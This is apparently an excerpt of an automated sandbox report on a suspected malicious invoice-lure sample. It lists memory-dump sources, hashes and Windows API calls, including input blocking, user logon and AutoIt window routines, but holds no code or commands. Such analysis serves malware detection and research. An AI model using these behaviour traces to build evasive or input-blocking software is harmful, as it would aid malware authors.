                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Proc
                                                          • String ID:
                                                          • API String ID: 2346855178-0
                                                          • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                          • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                          • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                          • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 0045A38B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                          • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                          • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                          • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                          • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                          • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                          • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                          • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                          • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                          • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                          • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                          • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                          • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: N@
                                                          • API String ID: 0-1509896676
                                                          • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                          • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                          • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                          • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                          • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                          • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                          • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                          • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                          • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                          • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                          • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                          • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                          • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                          • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                          • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                          • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                          APIs
                                                          • DeleteObject.GDI32(?), ref: 0045953B
                                                          • DeleteObject.GDI32(?), ref: 00459551
                                                          • DestroyWindow.USER32(?), ref: 00459563
                                                          • GetDesktopWindow.USER32 ref: 00459581
                                                          • GetWindowRect.USER32(00000000), ref: 00459588
                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                          • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                          • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                          • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                          • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                          • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                          • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                          • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                          • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                          • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                          • ShowWindow.USER32(?,00000004), ref: 00459865
                                                          • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                          • GetStockObject.GDI32(00000011), ref: 004598CD
                                                          • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                          • DeleteDC.GDI32(00000000), ref: 004598F8
                                                          • _wcslen.LIBCMT ref: 00459916
                                                          • _wcscpy.LIBCMT ref: 0045993A
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                          • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                          • GetDC.USER32(00000000), ref: 004599FC
                                                          • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                          • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                          • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 4040870279-2373415609
                                                          • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                          • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                          • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                          • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 0044181E
                                                          • SetTextColor.GDI32(?,?), ref: 00441826
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                          • GetSysColor.USER32(0000000F), ref: 00441849
                                                          • SetBkColor.GDI32(?,?), ref: 00441864
                                                          • SelectObject.GDI32(?,?), ref: 00441874
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                          • GetSysColor.USER32(00000010), ref: 004418B2
                                                          • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                          • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                          • DeleteObject.GDI32(?), ref: 004418D5
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                          • FillRect.USER32(?,?,?), ref: 00441970
                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                            • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                            • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                            • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                            • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                            • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                            • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                            • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                            • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                            • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                            • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                            • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                          • String ID:
                                                          • API String ID: 69173610-0
                                                          • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                          • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                          • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                          • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                          APIs
                                                          • DestroyWindow.USER32(?), ref: 004590F2
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                          • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                          • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                          • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                          • GetStockObject.GDI32(00000011), ref: 004592AC
                                                          • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                          • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                          • DeleteDC.GDI32(00000000), ref: 004592D6
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                          • GetStockObject.GDI32(00000011), ref: 004593D3
                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                          • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739969097.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739987235.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1740030250.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_NVOICE FOR THE MONTH OF AUG-24.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                          • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                          • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                          • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1739890202.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1739872889.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739937515.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1739954306.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
